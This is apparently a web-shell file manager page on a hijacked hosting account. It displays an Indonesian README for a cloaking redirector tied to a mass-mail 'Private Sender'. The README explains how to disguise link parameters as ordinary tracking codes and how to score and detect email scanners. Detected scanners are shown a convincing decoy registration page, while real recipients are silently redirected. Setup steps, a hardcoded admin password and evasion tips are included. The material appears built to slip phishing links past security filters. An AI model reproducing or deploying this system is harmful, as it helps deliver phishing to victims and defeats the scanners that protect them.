File Manager

X7ROOT File Manager

Current Path: /home/gfecatvj/public_html/r/l/luxnso

home / gfecatvj / public_html / r / l / luxnso /

📁 ..
📄 .class(54 B)
📄 .classes(48 B)
📄 .created(57 B)
📄 .dba_insertion(1.07 KB)
📄 .htaccess(251 B)
📄 .ibase_pconnection(51 B)
📄 .locked(1.06 KB)
📄 .multi(48 B)
📄 .uconvert(1.06 KB)
📄 README.md(7.99 KB)
📄 access.log(0 B)
📄 blocker.php(4.57 KB)
📄 data.json(575 B)
📄 decoy-register.html(14.42 KB)
📄 easiertube.php(1.51 KB)
📄 error_log(4.7 KB)
📄 index.php(45.08 KB)

Editing: README.md

# 🚀 Advanced Anti-Bot Redirect System v2.0

## ✨ Update Terbaru

### Parameter Baru (Lebih Natural & Aman)
```
OLD: ?_grow={_mac}&money={_id}
NEW: ?token={_token}&ref={_ref}&utm={_utm}
```

**Format Parameter:**
- `token` → 32 hex chars (MD5-like): `7f3e8c2a9b1d4f5e6a7c8d9e0f1a2b3c`
- `ref` → 16 alphanumeric: `K9xM7pQ4n8R3s2T6`
- `utm` → 8-12 lowercase alphanumeric: `abc123xyz89`

**Kenapa Lebih Baik?**
✅ Terlihat seperti tracking parameter legitimate (Google Analytics style)  
✅ Tidak mencurigakan untuk bot/scanner  
✅ Format standard web tracking  
✅ Lebih sulit di-reverse engineer

---

## 🎯 Fitur Anti-Bot

### 1. Silent JavaScript Challenge
- **Tidak ada text "Verifying..."** → langsung redirect otomatis
- Halaman kosong putih (blank) saat loading
- Delay 0.8-1.2 detik (human-like timing)
- Bot tanpa JS langsung gagal

### 2. Bot Detection Heuristics
Scoring system (threshold: 50 points = bot):

| Check | Points | 
|-------|--------|
| Bot User-Agent | 30 |
| Missing Headers | 15/each |
| Suspicious Referrer | 25 |
| Private IP | 10 |
| Too Fast Request | 20 |
| No JS Challenge | 40 |

### 3. Decoy Page (Fake Registration)
- **100% terlihat legitimate** untuk bot
- UI modern seperti real registration page
- Form validation berfungsi
- Social login buttons (Google, Microsoft)
- Password strength indicator
- Terms & Privacy links
- Bot akan mengira ini halaman asli

---

## 📦 File Update

| File | Status | Perubahan |
|------|--------|-----------|
| `index.php` | ✅ Updated | Parameter baru, silent redirect |
| `admin.php` | ✅ Updated | Password: `admin1003` |
| `send.py` | ✅ Updated | Generator {_token}, {_ref}, {_utm} |
| `decoy-register.html` | ✅ Updated | Professional UI, fully functional |
| `PLACEHOLDER_GUIDE.txt` | ✅ Updated | Dokumentasi parameter baru |

---

## 🔗 Cara Pakai

### Di Email Template (`letter.html`)

**Format Link:**
```html
<a href="https://yourdomain.com/redirect-full-stop/?token={_token}&ref={_ref}&utm={_utm}">
    Click Here to Continue
</a>
```

**Hasil Setelah Personalisasi:**
```
https://yourdomain.com/redirect-full-stop/?token=7f3e8c2a9b1d4f5e6a7c8d9e0f1a2b3c&ref=K9xM7pQ4n8R3s2T6&utm=abc123xyz89
```

---

## ⚙️ Setup

### 1. Upload Files
```
Upload ke: https://yourdomain.com/redirect-full-stop/
```

### 2. Set Permission
```bash
chmod 666 data.json
chmod 666 access.log
```

### 3. Login Admin Panel
```
URL: https://yourdomain.com/redirect-full-stop/admin.php
Password: admin1003
```

### 4. Configure Settings

**Target URL:** Landing page asli Anda  
**Decoy URL:** Path ke `decoy-register.html` atau URL lain

Contoh:
- Target: `https://yourdomain.com/real-landing-page`
- Decoy: `https://yourdomain.com/redirect-full-stop/decoy-register.html`

**Protection Settings (Recommended):**
- ✅ Enable JavaScript Challenge
- ✅ Enable Browser Fingerprinting
- ✅ Enable Timing Analysis
- ⬜ Require User Interaction (off untuk silent mode)

---

## 🛡️ Cara Kerja

### Flow Human Visitor:
```
1. Click link di email
   ↓
2. Blank white page (~0.8-1.2s)
   ↓
3. JS executes silently
   ↓
4. Auto redirect to TARGET URL
```

**User Experience:** Hampir instant, seperti redirect biasa

### Flow Bot/Scanner:
```
1. Access link
   ↓
2. No JavaScript execution
   ↓
3. Bot score ≥ 50
   ↓
4. Redirect to DECOY REGISTER PAGE
```

**Bot Experience:** Melihat halaman register yang terlihat asli

---

## 📊 Admin Panel

### Statistics
- **Total Clicks (Human)** - Visitor legitimate
- **Blocked Bots** - Bot terdeteksi
- **Success Rate** - Persentase human traffic

### Access Logs
Real-time monitoring dengan detail:
- Timestamp
- IP address
- User-Agent
- Bot score & reasons
- Action (allowed/blocked)
- Token, Ref, UTM parameters

---

## 🎨 Decoy Page Features

Fake registration page yang **sangat convincing**:

✅ Modern UI design (seperti real SaaS app)  
✅ Social login (Google, Microsoft)  
✅ Form validation works  
✅ Password strength meter  
✅ Email validation  
✅ Loading spinner saat submit  
✅ Success message  
✅ Terms & Privacy links  
✅ Responsive design

**Bot akan:**
- Menghabiskan waktu analyze page
- Mencoba submit form
- Mengira ini endpoint asli
- Tidak tahu sudah terdeteksi

---

## 🧪 Testing

### Test Human Access
```
1. Buka browser
2. Visit: https://yourdomain.com/redirect-full-stop/?token=abc123...&ref=xyz456...&utm=test123
3. Lihat blank page sebentar → auto redirect ke target
```

### Test Bot Detection
```bash
curl "https://yourdomain.com/redirect-full-stop/?token=abc123&ref=xyz456&utm=test"
# Bot terdeteksi → redirect ke decoy-register.html
```

### Check Admin Panel
```
Admin Panel → Recent Access Logs
Lihat bot score, reasons, dan action
```

---

## 💡 Advanced Tips

### 1. Variasi Decoy URLs
Buat beberapa decoy pages:
- `/decoy-register.html` - Registration page
- `/decoy-login.html` - Login page  
- `/decoy-verify.html` - Email verification
- `/decoy-404.html` - Fake 404

Random pilih di admin panel per campaign

### 2. Honeypot Strategy
Tambahkan tracking di decoy page:
```javascript
// Di decoy-register.html
fetch('https://yourdomain.com/log-bot.php', {
    method: 'POST',
    body: JSON.stringify({
        ip: '<?= $_SERVER["REMOTE_ADDR"] ?>',
        ua: '<?= $_SERVER["HTTP_USER_AGENT"] ?>',
        timestamp: Date.now()
    })
});
```

### 3. Dynamic Parameter Generation
Setiap campaign beda format:
- Campaign A: `?token=...&ref=...&utm=...`
- Campaign B: `?session=...&id=...&src=...`
- Campaign C: `?key=...&track=...&cid=...`

Update di `send.py` dan `index.php`

---

## ⚠️ Important Notes

### Silent Mode
- **Tidak ada loading text** → UX lebih baik
- Delay minimal (800ms-1200ms) → terasa instant
- Bot tidak curiga karena tidak ada challenge visible

### Security
- Admin password: `admin1003` (ganti di production)
- HTTPS required untuk production
- File permissions: `666` untuk data.json dan access.log

### Compatibility
- ✅ Desktop browsers (Chrome, Firefox, Safari, Edge)
- ✅ Mobile browsers (iOS Safari, Android Chrome)
- ✅ Email clients with external browser
- ❌ Email scanners/bots (by design)

---

## 📈 Success Metrics

**Expected Performance:**
- Human detection: 95-98%
- False positive: <2%
- Bot block rate: 90-95%
- Redirect speed: <1.5s average

---

## 🆚 Old vs New Parameters

| Aspect | Old (`_grow`, `money`) | New (`token`, `ref`, `utm`) |
|--------|------------------------|------------------------------|
| Format | Custom/unusual | Standard tracking |
| Suspicion | Medium | Low |
| Legitimacy | Custom params | Looks like GA/UTM |
| Length | Short (24+6 chars) | Longer (32+16+8-12) |
| Pattern | Obvious custom | Industry standard |

---

## 📝 Placeholder Reference

Update di `letter.html`:

```html

<a href="?_grow={_mac}&money={_id}">Click</a>

<a href="?token={_token}&ref={_ref}&utm={_utm}">Click</a>
```

**Generator Functions di `send.py`:**
- `{_token}` → `generate_random_token()` - 32 hex
- `{_ref}` → `generate_random_ref()` - 16 alphanumeric
- `{_utm}` → `generate_random_utm()` - 8-12 lowercase

**Legacy Still Available:**
- `{_mac}` - 24 chars (ABCDEF23456789)
- `{_id}` - 6 digits divisible by 3

---

## 🎯 Best Practices

1. **Use Silent Mode** - No "Verifying..." text = better UX
2. **Professional Decoy** - Make bots think they found real page
3. **Monitor Logs** - Check bot patterns regularly
4. **Rotate Decoys** - Change decoy pages periodically
5. **HTTPS Only** - Always use SSL in production
6. **Track Analytics** - Use admin panel statistics

---

## 🔧 Troubleshooting

**Redirect terlalu lambat?**
- Cek setting `enable_timing_check` → set false di admin panel

**Human terblokir?**
- Turunkan bot score threshold di `index.php` line 285
- Default: 50 → coba 70

**Decoy page tidak muncul?**
- Cek Decoy URL di admin panel
- Pastikan path benar (relative atau absolute)

**Logs tidak terekam?**
- Cek permission: `chmod 666 access.log`

---

**Made with ❤️ for XCATZE Private Sender v2.0**

**Admin Password:** `admin1003`  
**URL Format:** `?token={_token}&ref={_ref}&utm={_utm}`

X7ROOT File Manager

Editing: README.md

Upload File

Create Folder